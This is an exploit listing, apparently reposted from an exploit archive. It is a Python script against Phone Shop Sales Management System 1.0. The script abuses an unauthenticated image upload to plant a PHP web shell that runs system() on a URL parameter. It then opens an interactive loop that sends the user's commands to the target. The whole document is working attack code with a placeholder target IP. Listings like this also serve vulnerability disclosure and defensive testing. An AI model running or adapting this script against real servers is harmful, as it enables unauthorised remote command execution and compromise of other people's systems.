Exploit for Phone Shop Sales Management System 1.0 Shell Upload

Name: Exploit for Phone Shop Sales Management System 1.0 Shell Upload
Rating: 5 (154 reviews)
2021-04-20 | CVSS -0.3
## https://sploitus.com/exploit?id=PACKETSTORM:162241
# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)  
# Date: 20/04/21  
# Exploit Author: Richard Jones  
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html  
# Version: 1.0  
# Tested on: Windows 10 build 19041 + xampp 3.2.4  
  
import requests  
import sys  
  
IP="127.0.0.1" # CHANGE ME  
  
ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"  
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"  
s = requests.Session()  
  
def postShell():  
  
data = {  
"ProductName":"1",  
"BrandName":"1",  
"ProductPrice":1,  
"Quantity":"1",  
"TotalPrice":1,  
"DisplaySize":"1",  
"OperatingSystem":"1",  
"Processor":"1",  
"InternalMemory":"1",  
"RAM":"1",  
"CameraDescription":"1",  
"BatteryLife":"1",  
"Weight":"1",  
"Model":"1",  
"Dimension":"1",  
"date2":"1",  
"Description":"1",  
"_wysihtml5_mode":"1",  
}  
  
  
fileData = {  
'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}  
  
r = s.post(ADDURL, files=fileData, data=data)  
  
if "The product is successfully added" in r.text:  
return True  
else:  
return False  
  
def runWebShell():  
try:  
while True:  
cmd=input("\033[32;1m" +"$: "+ "\033[0m")  
if cmd == "exit":  
sys.exit()  
r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)  
if r.status_code == 200:  
print(r.text)  
else:  
raise Exception("Cmd error")  
except KeyboardInterrupt():  
sys.exit()  
  
def banner():  
ban = r"""__________.__ _________.__ _________ .__ _____ _________   
\______ \ |__ ____ ____ ____ / _____/| |__ ____ ______ / _____/____ | | ____ ______ / \ / _____/   
| ___/ | \ / _ \ / \_/ __ \ \_____ \ | | \ / _ \\____ \ \_____ \\__ \ | | _/ __ \ / ___/ / \ / \ \_____ \   
| | | Y ( <_> ) | \ ___/ / \| Y ( <_> ) |_> > / \/ __ \| |_\ ___/ \___ \ / Y \ / \   
|____| |___| /\____/|___| /\___ > /_______ /|___| /\____/| __/ /_______ (____ /____/\___ >____ > \____|__ / /\ /_______ / /\   
\/ \/ \/ \/ \/ |__| \/ \/ \/ \/ \/ \/ \/ \/ """  
  
return ban  
  
def main():  
print("\033[34;1m" + banner() + "\033[0m")  
print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")  
print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")  
if postShell():  
print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")  
runWebShell()  
  
if __name__ == "__main__":  
main()